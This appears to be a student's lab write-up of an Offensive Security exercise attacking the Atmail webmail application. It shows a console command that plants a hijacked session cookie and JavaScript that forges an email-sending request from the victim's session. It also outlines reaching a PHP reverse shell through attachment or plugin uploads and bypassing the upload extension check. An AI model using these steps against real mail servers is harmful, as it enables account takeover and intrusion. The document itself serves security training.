Review Summary

1. Identify the web injection point with the provided tool. Get the cookie and use the cookie through the following command in browser console:

javascript:void(document.cookie=”atmail6=1fp0fjq4aa8sm5if934b62ptv6”);

2. Session Riding vs. Session Hijacking 3. Forge the request (Official tutorial use sending email as an example). To send a email through js, we could use the following code:

var email = “attacker@offsec.local“;
var subject = “hacked!”;
var message = “This is a test email!”;
function send_email()
{
var uri =”/index.php/mail/composemessage/send/tabId/viewmessageTab1”;
var query_string = “?emailTo=” + email + “&emailSubject=” + subject + “&emailBodyHtml=” + message;
xhr = new XMLHttpRequest();
xhr.open(“GET”, uri + query_string, true);
xhr.send(null);
}
send_email();

4. Code execution through uploading attachment (php reverse shell). 5. Extra Mile:

Previously, we talked about an alternative path to remote code execution. That is, via the plugins. Research this and discover the requests that are needed to upload PHP code via this method. Then, use that as your remote code execution payload and combine it with your XSS to achieve a virtually unassisted remote shell on your Atmail target.

Let’s dig into this problem. When I try to upload random txt file onto the ATmail server admin page, I was informed “invalid extension”. It seems that I need to bypass the upload limit. I have two ideas in mind: (1) look into the official document. (2) Check the source code. From online forums, I can see that users are using .php extension php. Yet when I try the php pages, those files were not uploaded correctly. Hence I look into the source code. I won’t include the full source code here, but the key points are:

  1. target plugin should be in tgz format.
  2. The plugin is extracted to a temp folder. This folder is created through php function tempnam.
  3. There is a shell_exec function to extract the folder to target file.